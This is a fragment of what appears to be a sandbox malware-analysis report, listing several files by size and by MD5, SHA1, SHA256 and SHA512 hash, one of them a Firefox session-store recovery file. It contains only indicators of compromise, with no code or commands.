SHA1dc7e98ad3cf8d7be84f6b3074158b7196356675b
SHA256eb98fa2cfe142976b33fc3e15cf38a391f079e01cf61a82577b15107a98dea02
SHA512edd0c26c0b1323344eb89f315876e9deb460817fc7c52faedadad34732797dad0d73906f63f832e7c877a37db4b2907c071748edfad81ea4009685385e9e9137
-
Filesize
8KB
MD53eef49056ff9be3dadb8f52454157a2c
SHA164e487d629a1e2623d9a7c2738f2fcc817d7cd92
SHA25686a00c21616d1f84b85bb1b6a7910123a8946516b83075bd557b31f3d979667b
SHA51208359513076ec8eb47149ba77bf02ebad192ef922b0ead8bbadd749c1124188cefb6c06a868ff5f028af712d54f4516dbd2bf6028b666f6ad4523f4b548b5dc1
-
Filesize
6KB
MD5439d21ce9b3121a288df978695eb64e7
SHA11c2b5c1b9319c8929281ee626f119780b633d57b
SHA256b5cd6537c287800b84bd24d31d71e51bb387c681262d2f09b2b5dc86ed474c53
SHA512e4c36b8d58386c35131ed5d60e07a1ba8668e5340196c2feb3bb3e1981164280cddf9232dc63617f21fd016a7921eb6499351a831873122b6bbed9f739b69246
-
Filesize
6KB
MD5b579cb5151b3b4892c4603e03c81cfdc
SHA121e7ad27b84259c3506f2f9363323f2223d6d985
SHA256c4856f57c25dcc68700832787a9bc6a2ad912c5565931a9e49b7ba316aacc0c7
SHA51228b5c5a24f6719569eaff9f4f16a6c95a65822cdb27a90e9d692a662cd7264666745b1fbec22c8b2fca135891c038ec13f41030dc5c5f3b822f62eed0a72a9df
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD5530e41beedfc03da1344d89c9fb65276
SHA14ce7cba3efffb8338e720801818d8c54882afffa
SHA2563ab196b23babdafdf58d31d4416221ded2d9fbbf1c20badae25357d57ea65c5d
SHA512a4d6f3beda8f41203a2df9690f131456a17f88c019c0ea22d15f43139eaca9c82ab582b91996298bf1b8a12903f67cb5378f45bdc9b0a2318c2d80b60e6dfbdc
-
Filesize
860KB
MD56c0856aaaea0056abaeb99fd1dc9354f
SHA1dd7a9b25501040c5355c27973ac416fbec26cea1
SHA2565a3e6b212447ecee8e9a215c35f56aa3a3f45340f116ad9015c87d0c9c6e21af
SHA5121824a34d5dc61f567b13b396cca7b7f102d55d05cb0d51d891156d7529401a17ff42215eea4c8c00776679f3ce83180f63eda0fe6ae3957464aa5e31d9bb4f2a
-
Filesize
446KB
MD54d20b83562eec3660e45027ad56fb444
SHA1ff6134c34500a8f8e5881e6a34263e5796f83667
SHA256c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1
SHA512718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4